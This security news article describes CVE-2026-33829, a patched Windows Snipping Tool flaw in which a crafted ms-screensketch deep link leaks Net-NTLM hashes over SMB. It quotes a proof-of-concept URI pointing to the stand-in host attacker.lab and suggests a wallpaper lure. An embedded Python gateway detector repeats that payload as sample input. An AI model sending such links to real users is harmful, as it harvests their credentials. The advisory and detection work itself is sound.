
Tracked as CVE-2026-33829, the issue was discovered by security researcher Margaruga from the BlackArrowSec Red Team and is documented in their redteam-research repository.
NTLM Leak via Deep Link Abuse
The flaw stems from a deep link protocol registered by the Snipping Tool application, identified as ms-screensketch.
This URI scheme accepts a parameter named filePath which, when improperly validated, can coerce Windows into connecting to a remote SMB share.
As a result, the user’s Net-NTLM hash is transmitted to the attacker-controlled server.
In essence, the vulnerability enables an NTLM leak and an authentication spoofing scenario where sensitive credentials can be extracted across the network without direct access to the affected system.
Exploiting CVE-2026-33829 requires user interaction; however, even minimal engagement, such as opening a specially crafted link or visiting a malicious webpage, is enough to trigger the issue.
Security analysts at BlackArrowSec demonstrated that opening a crafted URI like:
```text
ms-screensketch:edit?&filePath=\\attacker.lab\image.png&isTemporary=false&saved=true&source=Toast
```
forces the Snipping Tool to initiate an SMB connection to the remote address, effectively disclosing the NTLM response from the current Windows account.
The vulnerability offers attackers strong social engineering opportunities. A threat actor could trick users into editing a supposedly legitimate image file, like a company wallpaper or ID photo, via malicious URLs such as:
```text
https://snip.example.com/wallpaper/image.png
```
While it appears to open locally in the Snipping Tool, the app silently makes an NTLM authentication attempt in the background, exposing credentials.
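The scheme-and-parameter behaviour described above lends itself to a simple content check at a mail or web gateway. The following is an added example, not code from the advisory or from BlackArrowSec's repository: it finds ms-screensketch: links in free text and flags any whose filePath is a UNC or file:// path pointing at a host other than the local machine. The host attacker.lab and the sample message body are constructed values.

```python
"""Flag ms-screensketch: deep links with a remote filePath (added example, not the advisory's code)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

SCHEME = "ms-screensketch"
LINK_RE = re.compile(r"ms-screensketch:[^\s\"'<>]+", re.IGNORECASE)
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]")   # \\host\share\... or //host/share/...
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

def remote_host(file_path):
    """Return the host a filePath value would connect to, or None if it is local."""
    p = unquote(file_path).strip()  # tolerate an extra layer of percent-encoding
    m = UNC_RE.match(p)
    if m:
        return m.group(1).lower()
    if p.lower().startswith("file:"):  # file://host/... also resolves over the network
        host = urlsplit(p).hostname
        if host and host.lower() not in LOCAL_HOSTS:
            return host.lower()
    return None

def analyze_deep_link(uri):
    """Classify one URI as ('ignore' | 'benign' | 'suspicious', detail)."""
    parts = urlsplit(uri)
    if parts.scheme.lower() != SCHEME:
        return ("ignore", "not an ms-screensketch link")
    # keys compared case-insensitively; parse_qs drops the empty pair left by a leading '&'
    params = {k.lower(): v for k, v in parse_qs(parts.query).items()}
    values = params.get("filepath", [])
    if not values:
        return ("benign", "no filePath parameter")
    for value in values:
        host = remote_host(value)
        if host:
            return ("suspicious", host)
    return ("benign", "filePath is local")

def scan_text(text):
    """Return [(link, remote_host)] for every suspicious deep link found in free text."""
    hits = []
    for m in LINK_RE.finditer(text):
        verdict, detail = analyze_deep_link(m.group(0))
        if verdict == "suspicious":
            hits.append((m.group(0), detail))
    return hits

SAMPLE_BODY = ("Please review the new wallpaper at "  # constructed message body, constructed host
               r"ms-screensketch:edit?&filePath=\\attacker.lab\wallpaper.png&isTemporary=false"
               " and the old one at ms-screensketch:edit?filePath=C:\\Users\\Public\\old.png")
```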
Though the flaw requires user interaction, it poses a serious risk on enterprise networks where NTLM hash leakage can lead to impersonation or lateral movement.
Spoofing attacks leveraging NTLM responses often serve as a stepping stone for further credential abuse or privilege escalation.
Microsoft released a security update on April 14, 2026, addressing this vulnerability. Users are strongly advised to apply all patches included in the April 2026 Windows Security Update immediately.
- March 23, 2026: Vulnerability reported to Microsoft
- April 14, 2026: Vendor issued fix and public advisory
- April 15, 2026: Technical details published by BlackArrowSec
Further information and a video proof-of-concept are available in the GitHub advisory and the demo file CVE-2026-33829.mp4.
The post Windows Snipping Tool Vulnerability Allows Attackers to Perform Network Spoofing appeared first on Cyber Security News.
